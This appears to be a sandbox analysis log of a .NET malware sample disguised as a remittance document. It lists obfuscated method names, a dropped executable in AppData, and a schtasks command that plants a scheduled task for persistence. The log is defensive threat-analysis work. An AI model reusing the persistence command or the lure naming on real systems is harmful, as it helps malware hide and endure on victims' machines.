            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, pEl1BokNiGulhgUCNc.csHigh entropy of concatenated method names: 'wvmUNG8C41', 'zOrUgkpbcZ', 'XneUafup1B', 'M5kUprhwVN', 'JBXUOyl878', 'EUUUj2yB8r', 'Mm3UXigEYX', 'f5MUwMCl5u', 'hl9UheluYP', 'zxwU5wigv8'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, MqXGgssMO1Fekyy8Ue.csHigh entropy of concatenated method names: 'TSoJyTLen1', 'lgbJVeDXFN', 'r1iecATgq5', 'qOie4XXRlF', 'wZVJF0IPsr', 'sdGJfWtTNs', 'p23JuH8SZF', 'OjJJ8XCibU', 'lMLJ1eetI5', 'h1EJq8RMN9'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, E3nYVuzF8BiBFLgvyG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LQT7r2dnq3', 'MjR7A2xZBg', 'Qye79xagac', 'FJq7Jdbx1W', 'YDH7e0xVPV', 'W5177skZLG', 'l3A7CWSwgT'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, IPTiVEoD9SEW2ijISU.csHigh entropy of concatenated method names: 'Dispose', 'ChZ4MxIRQj', 'HRHoZc5HZc', 'hN5SSi3RkW', 'fLC4VIxQXO', 'RW24zN5igM', 'ProcessDialogKey', 'PMfocoCnSX', 'Nn6o44coWa', 'C2xooLoImE'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, d87gQCndHkNhNRfkD8.csHigh entropy of concatenated method names: 'Uo9p6EZbMd', 'vEBpDiZjQt', 'kYNp0camaQ', 'IH3piCD1us', 'vHRpAmfeNI', 'KGfp9YKpmn', 'jZWpJydEOw', 'dfTpe5DyIE', 'yUYp7Kv9n4', 'l9IpCAK4Qo'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, ITbjRnelAIyF0LCEDn.csHigh entropy of concatenated method names: 'ToString', 'Swo9Fyalwy', 'cQe9ZBrC6T', 'Eyq9xSLpBO', 'ONw9bnfjfb', 'JM392r75J4', 'p1x9GMYM0q', 'cXb9LvfVZM', 'tUc93PMfTK', 'pv09TuZCNC'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, qXhj9uT83Th3DKXxfu.csHigh entropy of concatenated method names: 'tUWXgYJ8XR', 'T7IXpbMfvQ', 'f2iXjU1sG2', 'EHfjV1B8DC', 'jLWjztE4WA', 'spVXcnndem', 'lLwX4aRuAr', 'YR4Xo27Pyq', 'vJZXUFrrd8', 'fx4XHvcPX6'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, vgVMeh5ONaAkPMui60.csHigh entropy of concatenated method names: 'CiYOmFhZPy', 'hfjOt71JUw', 'lrfpxrLEd6', 'Nyppbgggcm', 'f82p2ygIlJ', 'zUVpG3P57B', 'RNnpL1ecPj', 'Kgbp3KkdyX', 'y2UpTk1cYB', 'oCPpYyQBem'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, S19G3ec6CaHZBvv4Er.csHigh entropy of concatenated method names: 'HP0J5MSKAa', 'iZBJPJKnCT', 'ToString', 'omWJgPZKmf', 'qb7JaT5QXc', 'UjQJptWTuL', 'iExJOo5GDX', 'CYvJjn0Rjl', 'Io8JX5iiuf', 'HLUJwoEfQV'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, BubSUn4g8lttOexA3X.csHigh entropy of concatenated method names: 'mJKr0w3Qx5', 'gKPrieX2wS', 'pW6rQJPqTe', 'owqrZuqjpB', 'v8trbpneg0', 'drUr2GKMYJ', 'muQrLb0yEd', 'g2xr3OWVxG', 'pTUrYhYHyZ', 'tnUrFrxD3B'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, vf1bhSdHHYJ8A9DRaw.csHigh entropy of concatenated method names: 'hr6XB658pa', 'FJTXRdkH8p', 'WXmXEpw358', 'CHZX6t58h3', 'm4jXmSHboT', 'SjoXDauvQC', 'ooYXtrLMaJ', 'Rw9X0Ys6h1', 'EGiXiWkUst', 'O1XXnFZlfe'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, Yuj46yNx4rpAlmUpiQ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'g04oM621eY', 'kqIoVyEBID', 's8pozHY3eo', 'FrkUcQ1ovf', 'kjnU4TfZtu', 'VVMUorpr9a', 'QJwUUeTPp6', 'utHicIGe2BKMn5lc8wX'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, U6C8XXUv0ve2kcHMmO.csHigh entropy of concatenated method names: 'Sy0jNRmqgh', 'cjmjaaI1jR', 'aTJjOK8TGa', 'qpOjXCGLjM', 'pIejwuebhY', 'eP8OWLlphc', 'fH9Osv4rYI', 'yWpOldfvMe', 'eTGOyOaZsx', 'BNJOMyJoZ7'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, mQ0VywCHpDCHBFas9G.csHigh entropy of concatenated method names: 'taaeQB1t9n', 'rOveZxtDVs', 'iBqexIso1f', 'uW1eboJbGL', 'ABQe8Wb4JL', 'WKse2jIYk4', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, dn8oJO8aicYPFuG3q7.csHigh entropy of concatenated method names: 'Sk5E7neIX', 'f5O6sZTnw', 'RwcDtjhnM', 'yNNtH2BGU', 'xiJicV9HV', 'x6DnX28FQ', 'kEMqgeJNTRYVvUlyfv', 'fnLSrl7AMgVNQj5FsB', 'svieKKdYP', 'KUkCI5KgH'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, vjrmrlWAG0dDAaMj2h.csHigh entropy of concatenated method names: 'Tva4XGCVq4', 'zsk4wX6IMD', 'BXJ45ZSyu7', 'lfA4PVd6N7', 'PWK4ASlOAH', 'CmL49NXIiM', 'D3aV20xIGENewBviV4', 'Wo6qCOYCmCdPoyO5DW', 'r9u44QDUXA', 'NUy4UDVEZW'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, i8egbkjFJP5F3RxotWg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sCyC8elkiF', 'U2UC1slHBX', 'xaACq6u8lH', 'QVPCdxoiXp', 'OtPCW3hSIS', 'IpLCsXcl6Q', 'snmCl0VEXf'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, zAgZHnjqnqblC13b4yB.csHigh entropy of concatenated method names: 'kcC7BswgDc', 'qeL7RfN8Ad', 'wR27ExLBk7', 'FK6762VMaC', 'CHS7mZq97P', 'N2D7DFUDT3', 'oxT7tp2a5Q', 'voD70fmrOd', 'JkT7iX9lHO', 'CE57nulydM'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, t2aK0SX3teb8FBFlWg.csHigh entropy of concatenated method names: 'e1fAYqLvvP', 'yYrAfyQLxo', 'dCoA81Ock3', 'aKUA18X0CQ', 'nyqAZNiEfq', 'P1jAxsm4Fq', 'z4eAbsO44W', 'kxoA2VhkZw', 'MI7AGoQuvx', 'dAsALtuhxO'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, eQDLlF0mF1BvPPtfCH.csHigh entropy of concatenated method names: 'kmla84c746', 'QR1a1hg6uX', 'ppCaqUTmLL', 'lnTadtaIP1', 'VpNaWe2qrr', 'v02ass96CK', 'f9PallIfPA', 'XKDayn3J4c', 'JXvaMuOAxK', 'YC3aVMM6lQ'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, py6OwdfHhY9vOuqCQL.csHigh entropy of concatenated method names: 'zTK74H0Igw', 'RJ27UhXr6O', 'H047H12k6M', 'VYB7g8Cack', 'xub7aDP7sl', 'asf7OToeLU', 'SbA7jIQjaB', 'LXdelkcZX8', 'znPeynlVua', 'SjeeMyi4pv'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, puU2W8ZrfZp4OhD3Tm.csHigh entropy of concatenated method names: 'glnegZiU9F', 'lIreaHqBFt', 'DapepisYH2', 'QKeeOVGvEb', 'RErejAp8ow', 'TVreXUM6R9', 'ph1ewDAuRw', 'gnFehjVXuZ', 'VZYe5ZdIEa', 'R38ePJMuMC'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, pEl1BokNiGulhgUCNc.csHigh entropy of concatenated method names: 'wvmUNG8C41', 'zOrUgkpbcZ', 'XneUafup1B', 'M5kUprhwVN', 'JBXUOyl878', 'EUUUj2yB8r', 'Mm3UXigEYX', 'f5MUwMCl5u', 'hl9UheluYP', 'zxwU5wigv8'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, MqXGgssMO1Fekyy8Ue.csHigh entropy of concatenated method names: 'TSoJyTLen1', 'lgbJVeDXFN', 'r1iecATgq5', 'qOie4XXRlF', 'wZVJF0IPsr', 'sdGJfWtTNs', 'p23JuH8SZF', 'OjJJ8XCibU', 'lMLJ1eetI5', 'h1EJq8RMN9'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, E3nYVuzF8BiBFLgvyG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LQT7r2dnq3', 'MjR7A2xZBg', 'Qye79xagac', 'FJq7Jdbx1W', 'YDH7e0xVPV', 'W5177skZLG', 'l3A7CWSwgT'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, IPTiVEoD9SEW2ijISU.csHigh entropy of concatenated method names: 'Dispose', 'ChZ4MxIRQj', 'HRHoZc5HZc', 'hN5SSi3RkW', 'fLC4VIxQXO', 'RW24zN5igM', 'ProcessDialogKey', 'PMfocoCnSX', 'Nn6o44coWa', 'C2xooLoImE'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, d87gQCndHkNhNRfkD8.csHigh entropy of concatenated method names: 'Uo9p6EZbMd', 'vEBpDiZjQt', 'kYNp0camaQ', 'IH3piCD1us', 'vHRpAmfeNI', 'KGfp9YKpmn', 'jZWpJydEOw', 'dfTpe5DyIE', 'yUYp7Kv9n4', 'l9IpCAK4Qo'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, ITbjRnelAIyF0LCEDn.csHigh entropy of concatenated method names: 'ToString', 'Swo9Fyalwy', 'cQe9ZBrC6T', 'Eyq9xSLpBO', 'ONw9bnfjfb', 'JM392r75J4', 'p1x9GMYM0q', 'cXb9LvfVZM', 'tUc93PMfTK', 'pv09TuZCNC'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, qXhj9uT83Th3DKXxfu.csHigh entropy of concatenated method names: 'tUWXgYJ8XR', 'T7IXpbMfvQ', 'f2iXjU1sG2', 'EHfjV1B8DC', 'jLWjztE4WA', 'spVXcnndem', 'lLwX4aRuAr', 'YR4Xo27Pyq', 'vJZXUFrrd8', 'fx4XHvcPX6'
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeFile created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
